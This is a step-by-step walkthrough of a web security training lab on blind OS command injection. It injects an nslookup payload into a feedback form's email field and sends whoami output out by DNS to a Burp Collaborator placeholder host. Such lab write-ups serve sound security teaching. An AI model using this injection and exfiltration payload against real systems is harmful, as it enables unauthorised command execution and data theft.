Blind OS command injection with out-of-band data exfiltration

Lab Description

Walkthrough

Step 1: Understanding the Lab

This lab focuses on blind OS command injection, where command outputs are exfiltrated via DNS queries to an external domain. The task is to execute the whoami command and exfiltrate the result using Burp Collaborator.

Step 2: Understanding the Feedback Functionality

The Submit Feedback page contains four input fields:

• Name

• Email

• Subject

• Message

Our goal is to test whether these fields are vulnerable to command injection by leveraging out-of-band (OOB) interactions

Step 3: Intercepting the Request

1. Submit the feedback form with dummy data (e.g., test in all fields).

2. Intercept the request in Burp Suite. The captured HTTP request contains:

   • The form inputs (e.g., name=test, email=test@test.net).

   • Other metadata such as CSRF tokens and cookies.

Objective: Modify one of these parameters to inject a payload that executes the whoami command and exfiltrates its output via a DNS query to Burp Collaborator. This will confirm both command injection and successful data exfiltration.

\

Step 4: Crafting the Payload

Modify one of the input fields (e.g., email) to inject the following payload:

||nslookup+$(whoami).BURP-COLLABORATOR-SUBDOMAIN||

Payload Explanation:

• ||: Delimiters to separate commands.

• nslookup: Executes a DNS lookup.

• $(whoami): Executes the whoami command and appends the output to the DNS query.

• BURP-COLLABORATOR-SUBDOMAIN: Your unique Collaborator server address.

Step 4: Verifying the Exploit

• Look for DNS queries logged by Burp Collaborator.

• The queried domain will contain the output of the whoami command, such as peter-Nrsm8s.BURP-COLLABORATOR-SUBDOMAIN.

This confirms that:

1. The server executed the injected command.

2. The command output (peter-Nrsm8s) was exfiltrated successfully.